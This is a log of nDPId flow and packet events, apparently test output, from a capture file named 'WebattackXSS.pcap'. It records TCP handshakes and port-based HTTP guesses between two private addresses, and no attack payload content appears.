-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7284,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":515,"flow_packet_id":3,"flow_last_seen":1499347842492,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347842492,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0lUhAAD4GMJCsEAABwKgKMoH2AFCtqqt9IYxAjIAQAOVuVwAAAQEICgE8PjwD5g+w"} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7299,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":442,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347716243,"flow_last_seen":1499347721814,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347843851,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60180,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7299,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":442,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347716243,"flow_last_seen":1499347721814,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347843851,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60180,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7299,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":443,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347717533,"flow_last_seen":1499347722814,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347843851,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60194,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7299,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":443,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347717533,"flow_last_seen":1499347722814,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347843851,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60194,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7299,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":444,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347720094,"flow_last_seen":1499347725815,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347843851,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60220,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7299,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":444,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347720094,"flow_last_seen":1499347725815,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347843851,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60220,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7299,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":445,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347721376,"flow_last_seen":1499347726816,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347843851,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60234,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7299,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":445,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347721376,"flow_last_seen":1499347726816,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347843851,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60234,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7299,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":446,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347724082,"flow_last_seen":1499347729818,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347843851,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60260,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7299,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":446,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347724082,"flow_last_seen":1499347729818,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347843851,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60260,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7302,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":516,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347845077,"flow_last_seen":1499347845077,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347845077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33296,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7302,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":516,"flow_packet_id":1,"flow_last_seen":1499347845077,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347845077,"pkt":"ABm5CmnxAMGxFOsxCABFAAA83IxAAD4G6UOsEAABwKgKMoIQAFCGLpxOAAAAAKACchB4KAAAAgQFtAQCCAoBPEDCAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7303,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":516,"flow_packet_id":2,"flow_last_seen":1499347845077,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347845077,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQghDt+J+Thi6cT6AScSDVXgAAAgQFtAQCCAoD5hI2ATxAwgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":516,"flow_packet_id":3,"flow_last_seen":1499347845078,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347845078,"pkt":"ABm5CmnxAMGxFOsxCABFAAA03I1AAD4G6UqsEAABwKgKMoIQAFCGLpxP7fiflIAQAOV0ZgAAAQEICgE8QMID5hI2"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7311,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":517,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347846345,"flow_last_seen":1499347846345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347846345,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33310,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7311,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":517,"flow_packet_id":1,"flow_last_seen":1499347846345,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347846345,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8NftAAD4Gj9WsEAABwKgKMoIeAFCnQ3QEAAAAAKACchB+EgAAAgQFtAQCCAoBPEH\/AAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7312,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":517,"flow_packet_id":2,"flow_last_seen":1499347846345,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347846345,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgh6m5yHpp0N0BaAScSCexwAAAgQFtAQCCAoD5hNzATxB\/wEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7313,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":517,"flow_packet_id":3,"flow_last_seen":1499347846345,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347846345,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0NfxAAD4Gj9ysEAABwKgKMoIeAFCnQ3QFpuch6oAQAOU9zwAAAQEICgE8Qf8D5hNz"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7323,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":518,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347847629,"flow_last_seen":1499347847629,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347847629,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33324,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7323,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":518,"flow_packet_id":1,"flow_last_seen":1499347847629,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347847629,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8TMtAAD4GeQWsEAABwKgKMoIsAFDM8A+LAAAAAKACchC7jwAAAgQFtAQCCAoBPENAAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7324,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":518,"flow_packet_id":2,"flow_last_seen":1499347847629,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347847629,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgizINJmdzPAPjKAScSBCAgAAAgQFtAQCCAoD5hS0ATxDQAEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7326,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":518,"flow_packet_id":3,"flow_last_seen":1499347847630,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347847630,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0TMxAAD4GeQysEAABwKgKMoIsAFDM8A+MyDSZnoAQAOXhCQAAAQEICgE8Q0AD5hS0"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7341,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":519,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347850209,"flow_last_seen":1499347850209,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347850209,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33350,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7341,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":519,"flow_packet_id":1,"flow_last_seen":1499347850209,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347850209,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8OS9AAD4GjKGsEAABwKgKMoJGAFCA5HzqAAAAAKACchCXnQAAAgQFtAQCCAoBPEXFAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7342,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":519,"flow_packet_id":2,"flow_last_seen":1499347850209,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347850209,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgkZb8bIlgOR866AScSBvRgAAAgQFtAQCCAoD5hc5ATxFxQEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7343,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":519,"flow_packet_id":3,"flow_last_seen":1499347850210,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347850210,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0OTBAAD4GjKisEAABwKgKMoJGAFCA5HzrW\/GyJoAQAOUOTgAAAQEICgE8RcUD5hc5"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7353,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":520,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347851476,"flow_last_seen":1499347851476,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347851476,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33364,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7353,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":520,"flow_packet_id":1,"flow_last_seen":1499347851476,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347851476,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8d+RAAD4GTeysEAABwKgKMoJUAFCuljDmAAAAAKACchC0pAAAAgQFtAQCCAoBPEcCAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7354,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":520,"flow_packet_id":2,"flow_last_seen":1499347851476,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347851476,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQglT2+WNtrpYw56AScSA+wAAAAgQFtAQCCAoD5hh2ATxHAgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7355,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":520,"flow_packet_id":3,"flow_last_seen":1499347851476,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347851476,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0d+VAAD4GTfOsEAABwKgKMoJUAFCuljDn9vljboAQAOXdxwAAAQEICgE8RwID5hh2"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7365,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":521,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347852742,"flow_last_seen":1499347852742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347852742,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33378,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7365,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":521,"flow_packet_id":1,"flow_last_seen":1499347852742,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347852742,"pkt":"ABm5CmnxAMGxFOsxCABFAAA87IFAAD4G2U6sEAABwKgKMoJiAFDnuKS\/AAAAAKACchAGXwAAAgQFtAQCCAoBPEg+AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7366,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":521,"flow_packet_id":2,"flow_last_seen":1499347852742,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347852742,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgmLb7idG57ikwKAScSDmbwAAAgQFtAQCCAoD5hmzATxIPgEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7367,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":521,"flow_packet_id":3,"flow_last_seen":1499347852743,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347852743,"pkt":"ABm5CmnxAMGxFOsxCABFAAA07IJAAD4G2VWsEAABwKgKMoJiAFDnuKTA2+4nR4AQAOWFdwAAAQEICgE8SD4D5hmz"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7380,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":447,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347725355,"flow_last_seen":1499347730818,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347854024,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60274,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7380,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":447,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347725355,"flow_last_seen":1499347730818,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347854024,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60274,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7380,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":448,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347726623,"flow_last_seen":1499347731818,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347854024,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60288,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7380,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":448,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347726623,"flow_last_seen":1499347731818,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347854024,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60288,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7380,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":449,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347729211,"flow_last_seen":1499347734819,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347854024,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60314,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7380,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":449,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347729211,"flow_last_seen":1499347734819,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347854024,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60314,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7380,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":450,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347730501,"flow_last_seen":1499347735819,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347854024,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60328,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7380,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":450,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347730501,"flow_last_seen":1499347735819,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347854024,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60328,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7380,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":451,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347731797,"flow_last_seen":1499347736820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347854024,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60342,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7380,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":451,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347731797,"flow_last_seen":1499347736820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347854024,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60342,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7380,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":452,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347733083,"flow_last_seen":1499347738820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347854024,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60356,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
